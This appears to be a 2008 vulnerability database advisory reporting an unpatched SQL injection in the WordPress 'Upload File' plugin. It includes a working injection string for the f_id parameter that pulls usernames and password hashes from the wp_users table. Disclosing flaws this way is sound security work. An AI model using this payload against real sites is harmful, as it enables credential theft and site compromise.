vuln in WordPress plugin Upload File(UP)

2008-05-25T00:00:00
ID SECURITYVULNS:DOC:19907
Type securityvulns
Reporter Securityvulns
Modified 2008-05-25T00:00:00

Description

New Advisory: Wordpress Plugin Upload File(UP) Remote SQL Injection

--------------------Summary---------------- Software: Upload File (WordPress Plugin) Critical Level: Moderate Type: SQL Injection Class: Remote Status: Unpatched PoC/Exploit: Not Available Solution: Not Available Discovered by: eserg.ru

-----------------Description--------------- 1. SQL Injection.

http://localhost/[path]/wp-uploadfile.php?f_id=[SQL] SQL query: null//union//all//select//concat(user_login,0x3a,user_pass)//from//wp_users/*

--------------PoC/Exploit---------------------- Waiting for developer(s) reply.

--------------Solution--------------------- No Patch available.

--------------Credit----------------------- Regards, Belsec Team http://eserg.ru